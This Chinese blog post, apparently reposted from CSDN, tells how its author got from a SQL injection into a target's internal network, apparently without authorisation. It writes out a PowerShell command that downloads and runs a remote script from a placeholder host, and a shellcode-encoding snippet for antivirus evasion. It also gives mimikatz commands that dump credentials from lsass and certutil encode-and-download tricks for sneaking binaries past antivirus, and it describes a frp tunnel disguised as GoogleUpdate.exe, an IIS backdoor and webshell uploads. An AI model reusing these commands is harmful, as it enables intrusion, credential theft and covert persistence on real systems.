首页 > 数据库 >【渗透实战系列】 从SQL注入渗透内网(渗透的本质就是信息搜集)

【渗透实战系列】 从SQL注入渗透内网(渗透的本质就是信息搜集)

时间:2024-10-26 15:51:23浏览次数:3  
标签:实战 网络安全 exe 渗透 学习 上线 SQL txt 内网

前言

一个 SQL 注入可以帮我们的不仅仅是获取数据库表里的数据,还能让我们直接获取到目标服务器的权限,减少我们渗透的时间,本文主要围绕 SQL 注入如何进内网来写的,不多说兄弟们看文章就完事了。

给我一个 SQL 注入我能干翻你内网

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~


卧槽有杀软

首先拿到一个站,权限很小,而且各种上线失败:

发现目标服务器是 2008 r2:

最后使用 powershell 上线

powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://xxxxx:9000/1.ps1')

上线后权限有问题,不能执行 shell 。 估计是对面机器上有杀软,被拦截了。

在这里我犯了一个大忌,直接无脑丢 exe 到目标机器上去执行,而不是先 tasklist 查看进程看看有没有 AV ,再去做免杀,大家在实际的过程中一定要注意,宁愿稳、慢、也不要粗暴!

Mssql 注入反弹 Powershell 上线

由于我们是通过Sql注入拿到的shell,这个时候我们发现目标可以开启xp_cmdshell 执行os-shell:

发现是管理员权限,这个时候通过 powershell 远程下载并执行 exe 上线 CS ,发现被拦截了:

随后使用 bypass 后的 powershell 脚本进行配合 sqlmap 执行命令成功上线:

拿到权限之后发现是一个工作组环境:

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

CobaltStrike 下的内网渗透

为了接下来的内网渗透,我们进行吧权限迁移到CS或者MSF上,我这边使用CS-Http上线:

之后用cs生成一个ps1,然后进行免杀:

https://www.cnblogs.com/forforever/p/13882312.html

$string = ''
$s = [Byte[]]$var_code = [System.Convert]::FromBase64String('这里是编码的 shellcode')
$s |foreach { $string = $string + $_.ToString()+','}
$string > c:\1.txt

本地测试一下:

powershell -ExecutionPolicy bypass -File .\index.ps1

可以上线!Virustotal 发现 bypass 了大部分 AV:

之后就上传到目标服务器成功上线CS:

虽然上线CS了,但是执行命令不了,可能是被拦截了:

这个时候我们尝试用 https 上线:

重复上面的操作:

随后运行 powershell 上线:

这个时候就能执行命令了:

随后 Run mimikatz 抓到了管理员的明文和哈希:

先不登录他远程桌面,我们先扫描内网存活主机,进行横向渗透:

发现存在大量机器:

之后进行 psexec 横向但是都没上线成功,我先做个流量socks代理:

之后发现他内网基本上都开放了 80 端口:

之后通过一个一个搞,中途拿下了几台机子后好像被发现了,这个时候发现sqlmap也没用了,它直接关站了!

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

峰回路转

过了几天,由于我之前留了一个 IIS 后门:


为了方便,我写了一个冰蝎马到网站目录

之后翻配置文件翻到了数据库密码:

还是那句话,除了在目标机器上抓系统账号密码,一定要去多翻翻机器上的其他文件:邮件、截截屏、翻翻浏览器记录、收藏夹、注册表、各类客户端软件目录下的配置文件…

这些文件里面很有可能包含大量有价值的账号密码,总之就一句话:拿到机器之后,先别急着上去就开始瞎扫,先把当前机器能翻的翻个底朝天,一直翻到不能动为止!千万别动不动上去不管三七二十一对着内网就说一段胡瞎扫,万一遇到什么流量检测设备苛刻点的环境,或者管理规范经验丰富的网管,可能很快就把你踢出局了,渗透过程中被对方发现是一件非常丢人的事情,实在是有点得不偿失,进入目标内网后,仔细耐心搜集信息永远是第一位的,宁愿慢、稳、也不要粗暴!

之后使用 procdump.exe 抓 lsass.dump 读取密码:

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit

这里有个坑,我使用 procdump.exe 读取 lsass.dmp 是保存为 2.txt,不知道为什么,目标服务器上只要有 lsass.dmp 就会被杀掉,所以我吧它修改为 txt 然后就不会被杀了,之后下载到本地吧它修改为 lsass.dmp 就没事了!

由于冰蝎的 socks 代理是基于 http 的,不稳定,那么我就用 frp 进行代理,再代理前,我把 客户端的 frp 图标修改为 google 的图标用于麻痹管理员:

然后上传到目标服务器上:

在这里有一个小技巧,如果对面有杀软你上传exe就会被杀,那么你可以使用编码,把 frpc.exe 编码为 txt:

CertUtil -encode frpc.exe frpc.txt

然后再使用 certUtil 下载 frpc.txt :

certutil.exe -urlcache -split -f frpc.txt的地址

之后再目标服务器解码就可以了:

CertUtil -decode frpc.txt frpc.exe

然后进行 frp 内网穿透:

GoogleUpdate.exe -c GoogleUpdate.ini

在然后就可以了:

然后直接上线 CS :

日到这里发现 10.0.0.0 这个网段只有一台主机存活:

那么就很尴尬了,我的目标是拿下目标核心域控,只能重新打点搞了!

朋友们如果有需要全套《网络安全入门+进阶学习资源包》,可以扫描下方二维码或链接免费领取~

峰回路转第二弹 - 注入 Getshell

这个时候就只能重新搞了!

我后面又找到了一些注入点:

但是执行不了命令,估计是写权限被写死了:

没办法,只能通过 SQLMAP 来进行信息搜集了,sqlmap --password 跑出一些密码:

执行 – sql-shell 可以读取 passwd 文件:

通过读文件,顺水推舟找到了数据库的配置文件:

之后通过sqlmap跑出来后台账号密码:

后台没做限制上传 php 成功 getshell:

然后通过查看网站源代码找到 php 路径:

但是蚁剑链接发现有问题:

这个时候用蚁剑的马上传:

成功 getshell !进入内网后发现没内网,而且没有翻到可利用的东西!哎,那么又得重新打点了!

峰回路转第三弹 - 注入到后台

然后我又找到了几处注入点:

同样不能执行命令:

后面找到后台账号密码登录到后台发现没有什么上传点:

最后日进了一个聊天室,但是没啥用:

结尾

其实本篇的技术不多,都是围绕 SQL 注入来写的,可见一个 SQL 注入就可以帮我们完成这么多的事情,一个 SQL 注入就能干翻内网,还是那句话,渗透的本质就是信息搜集,信息搜集的足够多,你渗透的成功性就会越大!

网络安全学习资源分享:

给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取

标签:实战,网络安全,exe,渗透,学习,上线,SQL,txt,内网
From: https://blog.csdn.net/qq_41314882/article/details/143232599

相关文章

  • 渗透测试是干什么?渗透测试零基础入门到精通,收藏这篇就够了
    您的组织是否有能力防御日益增多的网络攻击?渗透测试是评估组织IT和安全基础设施的最佳方法之一,因为它可以识别网络和系统中的漏洞。未修补的漏洞是对网络犯罪分子的公开邀请。美国国家标准与技术研究院(NIST)2021年发现了4,068个高风险漏洞。最近网络攻击的激增刺......
  • 企业数据高效集成:聚水潭与金蝶系统对接实战
    聚水潭盘亏-金蝶其他出库:高效数据集成方案在企业管理系统中,如何实现不同平台间的数据无缝对接一直是一个关键挑战。本文将分享一个具体的技术案例:如何通过轻易云数据集成平台,将聚水潭的盘亏数据高效集成到金蝶云星空的其他出库模块。背景与需求分析在本次集成项目中,我们需要从......
  • 2024版最新渗透测试工具整理大全(非常详细)渗透测试零基础入门到精通,收藏这篇就够了
    学习网络安全为什么需要掌握渗透测试工具使用相关知识?1.增强安全防御能力:通过对渗透测试工具的使用,安全专家可以更深入地理解攻击者可能采用的手法和策略,从而提前部署相应的防御措施,加固网络和系统的安全。2.发现并修复漏洞:渗透测试可以识别存在的安全漏洞,包括软件漏洞......
  • 一文彻底掌握MySQL的explain执行计划
    MySQL的执行计划是数据库查询优化的重要工具,帮助开发者理解SQL查询的执行过程,从而进行性能调优。执行计划详细展示了MySQL如何解析、优化和执行SQL语句,直接影响查询的效率和性能。1.执行计划的基本概念执行计划是MySQL对SQL查询进行分析后生成的一组指令,描述了如何......
  • 集成平台实现MySQL与金蝶云星空的数据对接
    MySQL数据集成到金蝶云星空:SR生产入库单新增-单工序-深圳天一-好在企业信息化系统中,数据的高效流转和准确对接是确保业务顺畅运行的关键。本文将分享一个实际案例,展示如何通过数据集成平台,将MySQL中的数据无缝集成到金蝶云星空,实现SR生产入库单新增的自动化处理。本次案例的核......
  • 高效集成聚水潭·奇门数据到MySQL的技术方案
    聚水潭·奇门数据集成到MySQL的技术案例分享在本次技术案例中,我们将探讨如何通过轻易云数据集成平台,将聚水潭·奇门的售后单数据高效、可靠地集成到MySQL数据库中。具体方案为“聚水潭-售后单-->BI虹盟-售后表”。这一过程不仅需要处理大量的数据,还需确保数据的完整性和实时性。......
  • 如何实现SQLServer与金蝶云星空的数据高效集成
    SQLServer数据集成到金蝶云星空:泛微项目=>金蝶辅助资料项目在企业信息化系统中,数据的高效流转和准确对接至关重要。本文将分享一个SQLServer数据集成到金蝶云星空的实际案例——泛微项目=>金蝶辅助资料项目。通过这一案例,我们将探讨如何利用轻易云数据集成平台,实现从SQLServe......
  • 钉钉数据集成到MySQL:对账系统--供应商账号
    钉钉数据集成到MySQL:对账系统--供应商账号在企业信息化管理中,数据的高效集成和处理是确保业务流程顺畅运行的关键环节。本文将分享一个实际案例,展示如何通过轻易云数据集成平台,将钉钉的数据无缝对接到MySQL数据库中,以实现对账系统中供应商账号的新增和管理。案例背景在本案例......
  • 一文彻底弄懂MySQL优化之深度分页
    深度分页(DeepPagination)在MySQL中指的是对大型数据集进行分页查询时,尤其是当需要获取较后页的数据时,性能可能会受到影响。传统的分页方法在数据量较大时,随着页数的增加,性能会迅速下降。本文将深入探讨深度分页的实现方式、问题及其解决方案。1.深度分页的基本概念在MySQL中,常......
  • 数据库MySQL篇
    系列文章目录第一章C/C++语言篇第二章计算机网络篇第三章操作系统篇第四章数据库MySQL篇第五章数据库Redis篇第六章场景题/算法题第七篇常见HR问题篇本系列专栏:点击进入后端开发面经关注走一波秋招阶段,面过很多大中小厂,积攒了很多面经,都是高频问题!!!前言:本系......